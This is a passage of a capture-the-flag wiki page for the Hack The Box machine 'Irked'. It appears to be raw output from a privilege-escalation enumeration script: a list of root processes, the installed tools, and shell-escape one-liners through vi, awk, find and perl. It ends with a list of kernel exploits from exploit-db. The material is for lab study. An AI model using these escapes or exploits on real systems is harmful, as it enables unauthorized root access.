root 80 06:40 0:00 [scsi_tmf_1]
root 14317 09:16 0:00 sshd:
root 69 06:40 0:00 [mpt_poll_0]
root 85 06:40 0:00 [kworker/0:1H]
root 11123 08:55 0:00 viewuser
root 1307 06:45 0:00 /usr/sbin/cupsd
root 2 06:40 0:00 [kthreadd]
root 561 06:40 0:00 /usr/lib/policykit-1/polkitd
root 20 06:40 0:00 [bioset]
root 3 06:40 0:11 [ksoftirqd/0]
root 13259 09:11 0:00 [kworker/0:0]
root 33 06:40 0:00 [deferwq]
root 10 06:40 0:00 [watchdog/0]
root 18 06:40 0:00 [crypto]
root 966 06:40 0:00 /sbin/agetty
root 2828 06:58 0:00 sshd:
root 76 06:40 0:00 [scsi_tmf_0]
root 498 06:40 0:00 /usr/sbin/cron
Possible Related Packages:
anacron 2.3-23 cron-like program that doesn't go by time
cron 3.0pl1-127+deb8u1 process scheduling daemon
root 16 06:40 0:00 [ksmd]
root 489 06:40 0:00 /usr/sbin/NetworkManager
Possible Related Packages:
gir1.2-networkmanager-1.0:i386 0.9.10.0-7 GObject introspection data for NetworkManager
root 68 06:40 0:00 [ata_sff]
root 5 06:40 0:00 [kworker/0:0H]
root 17 06:40 0:00 [khugepaged]
root 933 06:40 0:00 gdm-session-worker
root 72 06:40 0:00 [kpsmoused]
root 77 06:40 0:00 [scsi_eh_1]
root 543 06:40 0:00 /usr/sbin/acpid
Possible Related Packages:
acpid 1:2.0.23-2 Advanced Configuration and Power Interface event daemon
root 75 06:40 0:00 [scsi_eh_0]
root 487 06:40 0:00 /usr/lib/accountsservice/accounts-daemon
root 107 06:40 0:00 [jbd2/sda1-8]
root 19 06:40 0:00 [kintegrityd]
root 8 06:40 0:00 [rcu_bh]
root 476 06:40 0:00 [rpciod]
root 23 06:40 0:00 [kswapd0]
root 82 06:40 0:00 [scsi_tmf_2]
root 863 06:40 0:00 /usr/sbin/apache2
Possible Related Packages:
apache2 2.4.10-10+deb8u12 Apache HTTP Server
apache2-bin 2.4.10-10+deb8u12 Apache HTTP Server (modules and other binary files)
apache2-data 2.4.10-10+deb8u12 Apache HTTP Server (common files)
apache2-doc 2.4.10-10+deb8u12 Apache HTTP Server (on-site documentation)
apache2-utils 2.4.10-10+deb8u12 Apache HTTP Server (utility programs for web servers)
libapache2-mod-dnssd 0.6-3.1 Zeroconf support for Apache 2 via avahi
root 11128 08:55 0:00 /bin/sh
root 194 06:40 0:00 [ttm_swap]
root 81 06:40 0:00 [scsi_eh_2]
root 8039 08:47 0:00 sshd:
root 11126 08:55 0:00 sh
root 14320 09:16 0:00 [kworker/0:1]
root 514 06:40 0:00 /lib/systemd/systemd-logind
root 34 06:40 0:00 [kworker/u2:1]
root 478 06:40 0:00 [nfsiod]
root 553 06:40 0:00 [cfg80211]
root 31 06:40 0:00 [kthrotld]
root 139 06:40 0:00 [kauditd]
root 549 06:40 0:00 /usr/sbin/sshd
root 493 06:40 0:00 /usr/sbin/ModemManager
root 1 06:40 0:02 /sbin/init
Possible Related Packages:
hp-ppd 0.9-0.2 HP Postscript Printer Definition (PPD) files
init 1.22 System-V-like init utilities - metapackage
init-system-helpers 1.22 helper tools for all init systems
initramfs-tools 0.120+deb8u3 generic modular initramfs generator
initscripts 2.88dsf-59 scripts for initializing and shutting down the system
insserv 1.14.0-5 boot sequence organizer using LSB init.d script dependency information
libklibc 2.0.4-2 minimal libc subset for use with initramfs
lsb-base 4.1+Debian13+nmu1 Linux Standard Base 4.1 init script functionality
ncurses-base 5.9+20140913-1+deb8u2 basic terminal type definitions
ncurses-term 5.9+20140913-1+deb8u2 additional terminal type definitions
sysvinit-utils 2.88dsf-59 System-V-like utilities
xinit 1.3.4-1 X server initialisation tool
root 7 06:40 0:11 [rcu_sched]
root 12761 09:06 0:00 [kworker/0:2]
root 539 06:40 0:00 /usr/sbin/cups-browsed
Possible Related Packages:
cups-browsed 1.0.61-5+deb8u3 OpenPrinting CUPS Filters - cups-browsed
root 603 06:40 0:00 /usr/sbin/gdm3
Possible Related Packages:
gdm3 3.14.1-7 GNOME Display Manager
gir1.2-gdm3 3.14.1-7 GObject introspection data for the GNOME Display Manager
root 15 06:40 0:00 [writeback]
root 152 06:40 0:00 /lib/systemd/systemd-journald
root 12 06:40 0:00 [kdevtmpfs]
[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...
[+] Installed Tools
/usr/bin/awk
/usr/bin/perl
/usr/bin/python
/usr/bin/gcc
/usr/bin/cc
/usr/bin/vi
/usr/bin/nmap
/usr/bin/find
/bin/netcat
/bin/nc
/usr/bin/wget
/usr/bin/ftp
[+] Related Shell Escape Sequences...
nmap--> --interactive
vi--> :!bash
vi--> :set shell=/bin/bash:shell
awk--> awk 'BEGIN {system("/bin/bash")}'
find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
perl--> perl -e 'exec "/bin/bash";'
[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
- Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit || http://www.exploit-db.com/exploits/5720 || Language=python
The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
The following exploits are applicable to this kernel version and should be investigated as well
- Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
- Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
- CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
- CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
- open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
- open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
Finished
=================================================================================================
-
challenges/hackthebox/machines/irked.txt · Last modified: 2020/12/15 21:37 by didzkovitchz
